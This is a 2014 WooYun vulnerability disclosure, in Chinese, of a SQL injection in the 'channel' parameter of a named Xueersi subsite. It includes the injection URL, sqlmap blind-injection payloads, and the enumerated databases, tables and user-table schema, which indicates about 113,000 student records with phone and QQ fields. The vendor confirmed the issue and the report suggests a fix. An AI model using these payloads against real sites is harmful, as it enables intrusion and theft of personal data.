当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072424

漏洞标题:学而思旗下某分站SQL注入漏洞泄漏大量用户信息

相关厂商:好未来集团学而思培优

漏洞作者: Coffee

提交时间:2014-08-15 09:10

修复时间:2014-09-29 19:08

公开时间:2014-09-29 19:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-15: 细节已通知厂商并且等待厂商处理中
2014-08-15: 厂商已经确认,细节仅向厂商公开
2014-08-25: 细节向核心白帽子及相关领域专家公开
2014-09-04: 细节向普通白帽子公开
2014-09-14: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

学而思旗下某分站SQL注入漏洞泄漏大量用户信息
(最近都找学而思的了……有点丧病,估计这是最后一个了)

详细说明:

注入点:http://vip.eduu.com/event?channel=5
参数channel未过滤
sqlmap跑起来:
Place: GET
Parameter: channel
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channel=5) AND 9372=9372 AND (5377=5377
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: channel=5) AND SLEEP(5) AND (5061=5061
---
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] eduu_vip
[*] eduu_zuowen
[*] information_schema
[*] test
---
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
[28 tables]
+------------------------+
| edu_adimg |
| edu_baoming_misc |
| edu_doc |
| edu_doc_buylog |
| edu_doc_down |
| edu_edm_category |
| edu_edm_send_log |
| edu_edm_subscribe |
| edu_edm_subscribe_out |
| edu_edm_task |
| edu_event |
| edu_event_category |
| edu_event_ext |
| edu_event_user |
| edu_gift |
| edu_gift_decode |
| edu_gift_log |
| edu_notice |
| edu_set |
| edu_trends |
| edu_vip |
| edu_vip2 |
| edu_vip_credit_log |
| edu_vip_credit_loglist |
| edu_vip_credit_rule |
| edu_vip_dcode |
| edu_vip_exper_loglist |
| edu_vip_sms |
+------------------------+
back-end DBMS: MySQL 5.0.11
Database: eduu_zuowen
[6 tables]
+-------------+
| zw_artinfo |
| zw_column |
| zw_comment |
| zw_feedback |
| zw_teacher |
| zw_topic |
+-------------+
盲注跑得慢,随便找一张表看下数据量吧……
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
Table: edu_vip
[26 columns]
+-----------------------+-------------------------------------------------------------------------------------------------+
| Column | Type |
+-----------------------+-------------------------------------------------------------------------------------------------+
| course | set('语文','数学','英语','物理','化学','生物','地理','政治','历史','体育','音乐','美术','其他') |
| ctime | int(10) unsigned |
| downtimes | tinyint(3) unsigned |
| edctime | int(10) unsigned |
| email | varchar(100) |
| expertime | int(10) unsigned |
| grade | set('未上学','幼儿园择园','幼儿园','一年级','二年级','三年级','四年级','五年级','六年级','初一','初二','初三','高一','高二','高三','其他') |
| id | mediumint(8) unsigned |
| iden | tinyint(1) unsigned |
| ltime | int(10) unsigned |
| mbind | tinyint(3) unsigned |
| mobile | varchar(15) |
| peiyou_register_ctime | int(11) |
| peiyou_student_name | varchar(50) |
| peiyou_student_no | varchar(30) |
| qq | varchar(15) |
| residecity | varchar(50) |
| school | varchar(50) |
| state | tinyint(1) unsigned |
| tcity | tinyint(3) unsigned |
| type | tinyint(1) unsigned |
| uid | int(10) unsigned |
| uname | varchar(30) |
| uvip | tinyint(4) |
| vipexper | mediumint(8) unsigned |
| vipscore | mediumint(8) unsigned |
+-----------------------+-------------------------------------------------------------------------------------------------+
back-end DBMS: MySQL 5.0.11
Database: eduu_vip
+---------+---------+
| Table | Entries |
+---------+---------+
| edu_vip | 113379 |
+---------+---------+
11万,也不少了。而且看列名资料相当详细。姓名、学校、年级、年级、科目、手机号、QQ……一大堆。

漏洞证明:

back-end DBMS: MySQL 5.0.11
Database: eduu_vip
+---------+---------+
| Table | Entries |
+---------+---------+
| edu_vip | 113379 |
+---------+---------+

修复方案:

#1、过滤参数(如果程序员大哥不清楚SQL注入的话简单科普:http://drops.wooyun.org/papers/59)
#2、学而思网站安全做的还不错啊,找个洞也没有想象中容易~
#3、估计是最后一个了,祝学而思越办越好(好俗的话……)

版权声明:转载请注明来源 Coffee@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-15 10:13

厂商回复:

洞主小朋友威武,程序兄弟正哭着修复,谢谢支持!

最新状态:

暂无